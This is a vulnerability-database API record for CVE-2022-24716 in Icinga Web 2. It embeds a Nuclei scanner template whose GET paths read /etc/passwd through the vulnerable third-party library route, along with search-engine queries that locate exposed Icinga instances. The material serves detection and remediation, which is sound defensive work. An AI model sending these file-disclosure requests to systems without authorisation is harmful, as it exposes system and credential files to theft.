{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2022-24716/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2022-24716/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2022-24716/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2022-24716/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2022-24716/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2022-24716"},"sightings":{"href":"/api/v1/sightings/cve-2022-24716"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2022/CVE-2022-24716.yaml","nuclei_template_severity":"high","nuclei_template_yaml":"id: CVE-2022-24716\n\ninfo:\n  name: Icinga Web 2 - Arbitrary File Disclosure\n  author: DhiyaneshDK\n  severity: high\n  description: |\n    Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Unauthenticated users can leak the contents of files of the local system accessible to the web-server user, including `icingaweb2` configuration files with database credentials.\n  impact: |\n    The vulnerability can lead to unauthorized access to sensitive information, potentially exposing credentials, configuration files, and other sensitive data.\n  remediation: This issue has been resolved in versions 2.9.6 and 2.10 of Icinga Web 2. Database credentials should be rotated.\n  reference:\n    - https://github.com/JacobEbben/CVE-2022-24716/blob/main/exploit.py\n    - http://packetstormsecurity.com/files/171774/Icinga-Web-2.10-Arbitrary-File-Disclosure.html\n    - https://github.com/Icinga/icingaweb2/commit/9931ed799650f5b8d5e1dc58ea3415a4cdc5773d\n    - https://github.com/Icinga/icingaweb2/security/advisories/GHSA-5p3f-rh28-8frw\n    - https://security.gentoo.org/glsa/202208-05\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2022-24716\n    cwe-id: CWE-22\n    epss-score: 0.89378\n    epss-percentile: 0.99777\n    cpe: cpe:2.3:a:icinga:icinga_web_2:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 3\n    vendor: icinga\n    product: icinga_web_2\n    shodan-query:\n      - title:\"Icinga\"\n      - http.title:\"icinga\"\n      - http.title:\"icinga web 2 login\"\n    fofa-query:\n      - title=\"icinga web 2 login\"\n      - title=\"icinga\"\n    google-query:\n      - intitle:\"icinga\"\n      - intitle:\"icinga web 2 login\"\n  tags: cve,cve2022,packetstorm,icinga,lfi,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/lib/icinga/icinga-php-thirdparty/etc/passwd\"\n      - \"{{BaseURL}}/icinga2/lib/icinga/icinga-php-thirdparty/etc/passwd\"\n      - \"{{BaseURL}}/icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd\"\n\n    stop-at-first-match: true\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: header\n        words:\n          - text/plain\n\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a0047304502200ce605d069d9c3099c1e4f69318625a61ee89e1e484b991abeea81c21d4b9bd80221008df7bd3a1788055a875a47281f431bbf358907c8955c723e15597f8560bdb487:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2022-24716"}